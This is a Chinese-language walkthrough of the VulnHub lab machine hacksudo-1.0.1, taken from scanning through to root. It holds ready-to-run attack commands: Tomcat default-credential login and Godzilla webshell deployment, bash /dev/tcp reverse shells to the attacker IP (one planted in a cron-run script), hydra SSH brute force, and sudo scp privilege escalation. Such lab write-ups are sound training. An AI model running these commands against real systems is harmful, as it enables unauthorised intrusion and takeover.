[PHP知识库]渗透测试hacksudo-1.0.1 SCP提权

靶机信息

下载地址:

https://www.vulnhub.com/entry/hacksudo-101,650/

名称: hacksudo系列1.0.1

靶场: VulnHub.com

难度: 简单

发布时间: 2021年4月4日

提示信息: 无

目标: user.txt和root.txt

实验环境

攻击机:VMware  kali    192.168.7.3
靶机:Vbox     linux   IP自动获取

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 192.168.7.1/24

扫描到靶机地址为192.168.7.124

端口扫描

端口扫描是扫描目标机器所开放的服务

sudo nmap -sC -sV  -p- 192.168.7.124 -oN hacksudo.nmap

扫描到3个开放端口2222(SSH),80和8080都是HTTP服务,先看80端口

Web渗透

http://192.168.7.124

打开后看到一个登录页面,右边可以注册,源码里有些东西

可以看到下面的代码是文件包含,试一试

http://192.168.7.124/index.php?file=../../../../../../../../../../../../../../../../etc/passwd

没有返回,先做个目录扫描,等待时注册个帐号看看

填好信息邮箱aaa@qq.com密码123456

提交后报错

点击确定后看到输出的错误像是数据库连接失败

首页上方还有一段php代码,里面有个页面fandom.php我们访问看看

http://192.168.7.124/fandom.php

打开后有3个链接,点进去看看

进入后发现页面很奇,感觉像是php没解析,目录扫描也没有找敏感信息

dirsearch -u http://192.168.7.124 -e php,html,txt,zip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

访问8080端口

http://192.168.7.124:8080

打开后是Tomcat的默认页面,点击右边的Manager App可以进入管理页面,在弹出的登录框中随手填入帐号admin密码admin竟然登录成功了,有点不敢相信,过了一会我想截图,然后清空浏览器后再登录就失败了,随后试了几个帐号,最后用帐号tomcat和密码tomcat登录了

登录到后台我们就可以上传一个webshell,这里我还是用上次使用哥斯拉生成的godzilla.jsp详细操作步骤请看我的第8篇文章(靶机练习No.8 VulnHub靶场Thales)靶机练习No.8 VulnHub靶场Thales (qq.com),请不多说,我们上传webshell

Webshell

点击浏览选择你的webshell,然后点击部署

点击后可以看到godzilla这个目录,现在用哥斯拉连接

url中填入

http://192.168.7.124:8080/godzilla/godzilla.jsp

有效载荷要选JavaDynamicPayload,设置好的点击测试连接

提示Success!就可以点添加了

进入后点击命令执行我们反弹个shell(因为个人不喜欢这个界面,看着不舒服)

反弹shell

攻击机监听4444端口

nc -lvvp 4444

哥斯拉中输入

/bin/bash -c 'bash -i >& /dev/tcp/192.168.7.3/4444 0>&1'

反弹成功,切换成完整的交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键

stty -a
stty raw -echo;fg
reset

stty rows 44 columns 82

切换完成,现在查找下敏感文件

/varwww目录下找到一个backup文件,提示恢复访问权限从***不明白什么意思

/var/backups目录下有发现

cd /var/backups
ls -al
cd hacksudo

找到hacksudo目录,里面有三个文件,查看下内容

cat log.txt

得到字符串ilovestegno可能是密码

看一下有几个帐号可以登录

cat /etc/passwd

三个用户有登录权限root、hacksudo和vishal试试用刚才的密码能不能登录这三个帐号(都不登录),再找找

cd /home
ls
cat flag2.txt

cd office
ls

查看后没有可利用的文件,上传个pspy检查一下

kali攻击机开启http服务

python3 -m http.server

靶机上下载

cd /tmp
wget http://192.168.7.3:8000/pspy64
chmod +x pspy64
./pspy64

有发现,我们去看下是什么文件

cd /home/vishal/office
ls -al

可以看到manage.sh文件我们有读和执行的权限,看看是什么内容

cat manage.sh

没有可利用的地方,到这里已经走不下去了,暴破帐号密码试试吧

ssh密码暴破

我们知道了三个可以登录ssh的帐号,把他们放到字典里

vi user.txt

开始暴破密码

hydra -L user.txt -P ../../../Dict/常用密码.txt  192.168.7.124 -s 2222 ssh

暴破成功用户名vishal密码hacker,登录ssh

ssh vishal@192.168.7.124 -p 2222
输入密码hacker

登录成功,看一下manage.sh添加反弹sehll进去

cd office
ls -al
echo 'bash -i >& /dev/tcp/192.168.7.3/4444 0>&1' >manage.sh

kali攻击机重新开启监听4444端口,然后等待后台自动运行反弹shell

nc -lvvp 4444

反弹成功有lxd可以提权,先看看目录下有什么文件

ls
cat user.txt

拿到user.txt这个shell有点难用,切换交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

SCP免密提权

看下有什么可利用的

sudo -l

执行/usr/bin/scp不需要root密码,找一下scp如何提权

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
id

cd /root
ls
cat root.txt

拿到root权限,游戏结束